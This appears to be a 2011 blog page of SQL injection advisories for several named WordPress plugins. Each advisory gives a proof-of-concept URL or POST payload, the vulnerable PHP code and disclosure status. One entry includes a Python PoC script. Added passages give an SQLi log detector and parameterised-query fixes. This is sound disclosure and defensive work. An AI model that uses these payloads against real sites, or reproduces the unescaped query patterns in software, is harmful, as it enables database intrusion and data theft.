WordPress Ajax Gallery plugin <= 3.0 SQL Injection Vulnerability

# Exploit Title: WordPress Ajax Gallery plugin <= 3.0 SQL Injection Vulnerability
# Date: 2011-08-18
# Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)
# Software Link: http://downloads.wordpress.org/plugin/ajaxgallery.3.0.zip
# Version: 3.0 (tested)

---
PoC
---
http://www.site.com/wp-content/plugins/ajaxgallery/utils/list.php?delete=1&gId=-1 AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)

---------------
Vulnerable code
---------------
if( isset( $_GET[ 'delete' ]) && isset( $_GET['gId'] ) ){
  $wpdb->query( "DELETE FROM $wpdb->options WHERE option_name='agItem' and option_id=".$_GET['gId'] );
  echo "<div id='message' class='updated fade'><p><strong>Galeria eliminada</strong></p></div>";
}
p.s. can't find any contact information about the author (sxceron)

WordPress WP Forum plugin <= 1.7.8 SQL Injection Vulnerability

# Exploit Title: WordPress WP Forum plugin <= 1.7.8 SQL Injection Vulnerability
# Date: 2011-08-18
# Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)
# Software Link: http://downloads.wordpress.org/plugin/wpforum.1.7.8.zip
# Version: 1.7.8 (tested)

---
PoC
---
http://www.site.com/wp-content/plugins/wpforum/sendmail.php?action=quote&id=-1 UNION ALL SELECT @@version,2,3

---------------
Vulnerable code
---------------
...

else if(isset($_GET['action']) && $_GET['action'] == 'quote'){
	
	global $wpdb, $table_posts;
	$id = $_GET['id'];

	$text = $wpdb->get_row("SELECT text, author_id, date FROM $table_posts WHERE id = $id");
	$u = new WP_user($text->author_id);
	echo htmlentities("<blockquote>
<b>QUOTE</b> ($u->nickname @ ".date(get_option('forum_date_format'), strtotime($text->date)).")\n $text->text</blockquote>
");

p.s. author has been contacted (no reply yet)

WordPress WP DS FAQ plugin <= 1.3.2 SQL Injection Vulnerability

# Exploit Title: WordPress WP DS FAQ plugin <= 1.3.2 SQL Injection Vulnerability
# Date: 2011-08-18
# Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)
# Software Link: http://downloads.wordpress.org/plugin/wp-ds-faq.1.3.2.zip
# Version: 1.3.2 (tested)

---------------
PoC (POST data)
---------------
http://www.site.com/wp-content/plugins/wp-ds-faq/ajax.php
 action=delete_faqbook&id=-1 AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)

---------------
Vulnerable code
---------------
switch($_POST['action']) {

    ...

    case 'delete_faqbook':
        if(!isset($_POST['id'])){ error(); }
        $id = $_POST['id'];

        ...

        $sql = "DELETE FROM `".$table_name."` WHERE `id` = ".$id;
        $results = $wpdb->query( $sql );
p.s. author has been contacted (will fix it)

Wednesday, August 17, 2011

WordPress OdiHost Newsletter plugin <= 1.0 SQL Injection Vulnerability

# Exploit Title: WordPress OdiHost Newsletter plugin <= 1.0 SQL Injection Vulnerability
# Date: 2011-08-17
# Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)
# Software Link: http://downloads.wordpress.org/plugin/odihost-newsletter-plugin.zip
# Version: 1.0 (tested)

---
PoC
---
http://www.site.com/wp-content/plugins/odihost-newsletter-plugin/includes/openstat.php?uid=-1&id=-1 AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)

---------------
Vulnerable code
---------------
$newsletterid = $_GET["id"];

...
	
$wpdb->query("update newsletterstat set newsletterstatopened = CONCAT(newsletterstatopened ,'". $subscriberid . ",') where newsletterstatnewsletterid= ". $newsletterid);
p.s. author has been contacted (no reply yet)

WordPress Easy Contact Form Lite plugin <= 1.0.7 SQL Injection Vulnerability

# Exploit Title: WordPress Easy Contact Form Lite plugin <= 1.0.7 SQL Injection Vulnerability
# Date: 2011-08-17
# Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)
# Software Link: http://downloads.wordpress.org/plugin/easy-contact-form-lite.zip
# Version: 1.0.7 (tested)

---------------
PoC (POST data)
---------------
http://www.site.com/wp-content/plugins/easy-contact-form-lite/requests/sort_row.request.php
 field_num[]=-1 AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)

---------------
Vulnerable code
---------------
foreach ($_POST['field_num'] as $position=>$field_id) {
	
	if ($field_id > 0) {
		$query = "
			UPDATE $settings_table_name 
			SET position = '".$position."' 
			WHERE ID = $field_id";
		$wpdb->query($query);
	}
p.s. author has been contacted (no reply yet)

WordPress WP Symposium plugin <= 0.64 SQL Injection Vulnerability

# Exploit Title: WordPress WP Symposium plugin <= 0.64 SQL Injection Vulnerability
# Date: 2011-08-17
# Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)
# Software Link: http://downloads.wordpress.org/plugin/wp-symposium.0.64.zip
# Version: 0.64 (tested)

---
PoC
---
http://www.site.com/wp-content/plugins/wp-symposium/uploadify/get_profile_avatar.php?uid=-1 AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)

---------------
Vulnerable code
---------------
$uid = $_REQUEST['uid'];
$sql = "SELECT profile_avatar FROM ".$wpdb->base_prefix."symposium_usermeta WHERE uid = ".$uid;
p.s. author has been contacted (fixed)

WordPress File Groups plugin <= 1.1.2 SQL Injection Vulnerability

# Exploit Title: WordPress File Groups plugin <= 1.1.2 SQL Injection Vulnerability
# Date: 2011-08-17
# Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)
# Software Link: http://downloads.wordpress.org/plugin/file-groups.1.1.2.zip
# Version: 1.1.2 (tested)

---
PoC
---
http://www.site.com/wp-content/plugins/file-groups/download.php?fgid=-1 AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)

---------------
Vulnerable code
---------------
$fgid = $_GET['fgid'];

...

$file_list = $wpdb->get_col("select guid from wp_posts where post_parent = $fgid");
p.s. author has been contacted (will fix it)

WordPress Contus HD FLV Player plugin <= 1.3 SQL Injection Vulnerability

# Exploit Title: WordPress Contus HD FLV Player plugin <= 1.3 SQL Injection Vulnerability
# Date: 2011-08-17
# Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)
# Software Link: http://downloads.wordpress.org/plugin/contus-hd-flv-player.1.3.zip
# Version: 1.3 (tested)

---
PoC
---
http://www.site.com/wp-content/plugins/contus-hd-flv-player/process-sortable.php?playid=-1 AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)&listItem[]=1

---------------
Vulnerable code
---------------
$pid1 = $_GET['playid'];

// both $pid1 and every listItem[] element reach the query without escaping
foreach ($_GET['listItem'] as $position => $item) :
    mysql_query("UPDATE $wpdb->prefix" . "hdflv_med2play SET `sorder` = $position WHERE `media_id` = $item and playlist_id=$pid1 ");
endforeach;
p.s. author has been contacted (no reply yet)

Tuesday, August 16, 2011

WordPress IP-Logger plugin <= 3.0 SQL Injection Vulnerability

# Exploit Title: WordPress IP-Logger plugin <= 3.0 SQL Injection Vulnerability
# Date: 2011-08-16
# Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)
# Software Link: http://downloads.wordpress.org/plugin/ip-logger.3.0.zip
# Version: 3.0 (tested)

---
PoC
---
http://www.site.com/wp-content/plugins/ip-logger/map-details.php?lat=-1 UNION ALL SELECT @@version,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--%20&lon=0&blocked=0

---------------
Vulnerable code
---------------
// sprintf() only formats: %s pastes each request value into the SQL verbatim
$sql = sprintf("select stamp,ip_v4,url,user_agent,Provider,Code3,Country,
 Blocked,Ignored from $table_name
  where Latitude=%s and Longitude=%s and Blocked = '%s'
  order by stamp asc limit 50",
  $_REQUEST["lat"],
  $_REQUEST["lon"],
  $_REQUEST["blocked"]);

$res = mysql_query($sql);

p.s. author has been contacted (no reply yet)

Saturday, August 6, 2011

WordPress Media Library Categories plugin <= 1.0.6 SQL Injection Vulnerability

# Exploit Title: Media Library Categories <= 1.0.6 SQL Injection Vulnerability
# Date: 2011-08-06
# Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)
# Software Link: http://downloads.wordpress.org/plugin/media-library-categories.1.0.6.zip
# Version: 1.0.6 (tested)

---
PoC
---
http://www.site.com/wp-content/plugins/media-library-categories/sort.php?termid=-1 UNION ALL SELECT @@version,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--%20

http://www.site.com/wp-content/plugins/media-library-categories/sort.php?termid=1 AND EXTRACTVALUE(1,CONCAT(CHAR(92),@@version))

---------------
Vulnerable code
---------------
$termid=$_GET['termid'];

...

$where = '';
if($termid)
{
    // $termid is appended to the WHERE clause unescaped
    $where .= " && tt.term_id=".$termid;
}

...

$query = "SELECT p.*, a.term_order FROM " . $table_prefix . "posts p inner join " . $table_prefix . "term_relationships a on a.object_id = p.ID inner join " . $table_prefix . "term_taxonomy ttt on ttt.term_taxonomy_id = a.term_taxonomy_id inner join " . $table_prefix . "terms tt on ttt.term_id = tt.term_id where ttt.taxonomy='media_category' $where order by a.term_order asc;";

$results = mysql_query($query);

p.s. author has been contacted (fixed)
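The detection side of the advisories on this page, as an added example that is not part of the original posts: the payload shapes shown above (UNION ALL SELECT with @@version, BENCHMARK/SLEEP, EXTRACTVALUE) reduced to indicators and run over constructed Apache-style access-log lines. The log lines, IP addresses and the function name are constructed for this example.

```php
<?php
// Added example, not from the advisories. Flags access-log requests carrying the
// payload shapes shown on this page. Log lines below are constructed samples.

$sample_log = array(
    '203.0.113.5 - - [17/Aug/2011:10:01:02 +0000] "GET /wp-content/plugins/file-groups/download.php?fgid=12 HTTP/1.1" 200 512',
    '203.0.113.5 - - [17/Aug/2011:10:01:09 +0000] "GET /wp-content/plugins/file-groups/download.php?fgid=-1%20AND%201=IF(2%3E1,BENCHMARK(5000000,MD5(1)),0) HTTP/1.1" 200 0',
    '198.51.100.7 - - [06/Aug/2011:11:12:13 +0000] "GET /wp-content/plugins/media-library-categories/sort.php?termid=1%20AND%20EXTRACTVALUE(1,CONCAT(CHAR(92),@@version)) HTTP/1.1" 500 88',
    '198.51.100.9 - - [05/Aug/2011:12:00:00 +0000] "GET /wp-content/plugins/proplayer/playlist-controller.php?pp_playlist_id=7 HTTP/1.1" 200 1024',
);

// Indicators derived from the PoCs above, matched after URL-decoding and
// case-folding so %20 and mixed case do not slip past.
$indicators = array(
    'union_select' => '/\bunion\s+(all\s+)?select\b/i',
    'time_based'   => '/\b(benchmark|sleep)\s*\(/i',
    'error_based'  => '/\bextractvalue\s*\(/i',
    'fingerprint'  => '/@@version\b/i',
);

// Returns one entry per suspicious request: decoded target plus indicator names.
function flag_sqli_requests(array $lines, array $indicators) {
    $hits = array();
    foreach ($lines as $line) {
        // Pull the request target out of "METHOD target HTTP/x.y".
        if (!preg_match('#"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"#', $line, $m)) {
            continue;
        }
        $target = rawurldecode($m[1]);
        $pos    = strpos($target, '?');
        if ($pos === false) {
            continue;           // no query string: nothing to inspect here
        }
        $query   = substr($target, $pos + 1);
        $matched = array();
        foreach ($indicators as $name => $re) {
            if (preg_match($re, $query)) {
                $matched[] = $name;
            }
        }
        if ($matched) {
            $hits[] = array('target' => $target, 'indicators' => $matched);
        }
    }
    return $hits;
}

foreach (flag_sqli_requests($sample_log, $indicators) as $hit) {
    printf("%-25s %s\n", implode(',', $hit['indicators']), $hit['target']);
}
```

Only the request line is inspected, so a payload carried in a POST body is invisible to this check and needs request-body logging at the application or WAF layer.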

WordPress UPM Polls plugin <= 1.0.3 SQL Injection Vulnerability

# Exploit Title: UPM Polls <= 1.0.3 SQL Injection Vulnerability
# Date: 2011-08-06
# Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)
# Software Link: http://downloads.wordpress.org/plugin/upm-polls.1.0.3.zip
# Version: 1.0.3 (tested)

---
PoC
---
#!/usr/bin/env python

import re
import urllib2
import urlparse

url = "http://www.site.com/wp-content/plugins/upm-polls/includes/poll_logs.php?qid=-1 UNION ALL SELECT NULL,CONCAT(CHAR(96),@@version,CHAR(96)),NULL,NULL,NULL,NULL-- ".replace(" ", "%20")
req = urllib2.Request(url=url, headers={"Referer": url})
content = urllib2.urlopen(req).read()
match = re.search(r"`(.+)`", content)

print match.group(1) if match else "None"

---------------
Vulnerable code
---------------
// the only gate is a Referer host comparison; Referer is client-supplied (the PoC sets it to the target URL)
$ref = parse_url( $_SERVER['HTTP_REFERER'] );
if( $_SERVER["HTTP_HOST"] != $ref['host'] ){
 exit('UPM Error:128');
}

...

$QID = $_GET['qid'];
// $QID is interpolated unquoted into the WHERE clause
$POLL = $wpdb->get_row("SELECT * FROM `".$wpdb->prefix."pppm_polls` WHERE `id` = $QID", ARRAY_A);

p.s. author has been contacted (fixed)

Friday, August 5, 2011

WordPress Social Slider plugin <= 5.6.5 SQL Injection Vulnerability

# Exploit Title: Social Slider <= 5.6.5 SQL Injection Vulnerability
# Date: 2011-08-05
# Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)
# Software Link: http://downloads.wordpress.org/plugin/social-slider-2.zip
# Version: 5.6.5 (tested)

---------------
PoC (POST data)
---------------
http://www.site.com/wp-content/plugins/social-slider-2/ajax.php
 action=ZapiszPozycje&rA[]=1 AND SLEEP(5)

---------------
Vulnerable code
---------------
$SocialSliderArray = $_POST['rA'];

if (mysql_real_escape_string($_POST['action']) == "ZapiszPozycje")
    {
    $lC = 1;
    // only 'action' is escaped; each rA[] element is concatenated as-is
    foreach ($SocialSliderArray as $recordIDValue)
        {
        $query = "UPDATE ".$table_prefix."socialslider SET lp = ".$lC." WHERE id = ".$recordIDValue;
        mysql_query($query);
        $lC = $lC + 1;
        }
    }
p.s. author has been contacted (fixed)

WordPress ProPlayer plugin <= 4.7.7 SQL Injection Vulnerability

# Exploit Title: ProPlayer plugin <= 4.7.7 SQL Injection Vulnerability
# Date: 2011-08-05
# Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)
# Software Link: http://downloads.wordpress.org/plugin/proplayer.4.7.7.zip
# Version: 4.7.7 (tested)

---
PoC
---
http://www.site.com/wp-content/plugins/proplayer/playlist-controller.php?pp_playlist_id=-1') UNION ALL SELECT NULL,NULL,@@version--%20

---------------
Vulnerable code
---------------
function getPlaylist($id = '') {
 // $id lands inside a quoted literal; a single quote in the input terminates it
 $query = mysql_query("SELECT * FROM ".$this->tablePrefix."proplayer_playlist WHERE (POST_ID='$id')");
 $playlistRow = mysql_fetch_row($query);

 return $this->withBackwardCompatibility($playlistRow[2]);
}

...

if (!empty($_GET["pp_playlist_id"])) {
 header("Content-type: application/xml");
 $xml = $playlistController->getPlaylist($_GET["pp_playlist_id"]);

p.s. author has been contacted (no reply yet)
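The fix that every vulnerable snippet on this page needs is the same, so here it is once, as an added example that is not code from any of these plugins: request values bound through `$wpdb->prepare()` placeholders instead of concatenated, covering the three sink shapes seen above (bare integer, quoted string, and an array of ids from a sorting endpoint). It assumes it runs inside WordPress, where `$wpdb`, `absint()` and `current_user_can()` exist; the function names are hypothetical.

```php
<?php
// Added example, not code from any plugin above. Assumes it runs inside WordPress
// ($wpdb, absint(), current_user_can() available); function names are hypothetical.

// Keep only positive integers from a request array (rA[] / listItem[] above);
// a value like "1 AND SLEEP(5)" fails ctype_digit() and is dropped.
function safe_id_list($raw) {
    $ids = array();
    foreach ((array) $raw as $v) {
        if (is_string($v) && ctype_digit($v) && (int) $v > 0) {
            $ids[] = (int) $v;
        }
    }
    return $ids;
}

// Bare integer ("... WHERE uid = ".$uid): cast, then bind with %d.
function get_profile_avatar_safe($wpdb, $uid) {
    return $wpdb->get_var($wpdb->prepare(
        "SELECT profile_avatar FROM {$wpdb->base_prefix}symposium_usermeta WHERE uid = %d",
        absint($uid)
    ));
}

// Quoted string ("... WHERE (POST_ID='$id')"): bind with an unquoted %s;
// prepare() adds quoting and escaping, so a quote in the input stays data.
function get_playlist_safe($wpdb, $id) {
    return $wpdb->get_row($wpdb->prepare(
        "SELECT * FROM {$wpdb->prefix}proplayer_playlist WHERE POST_ID = %s", $id
    ), ARRAY_A);
}

// Ordering endpoints (ajax.php, process-sortable.php): a state-changing request
// needs an authorization check as well as one bound UPDATE per element.
function save_positions_safe($wpdb, $raw_ids) {
    if (!current_user_can('manage_options')) {
        return false;
    }
    $position = 1;
    foreach (safe_id_list($raw_ids) as $id) {
        $wpdb->query($wpdb->prepare(
            "UPDATE {$wpdb->prefix}socialslider SET lp = %d WHERE id = %d",
            $position, $id
        ));
        $position++;
    }
    return true;
}
```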

Monday, August 1, 2011

ModSecurity Level II award

I've just got (via FedEx) the winners' T-shirt from @ModSecurity for successfully passing the Level II challenge as one half of the "Sqlmap Developers" team :)

miroslav stampar modsecurity challenge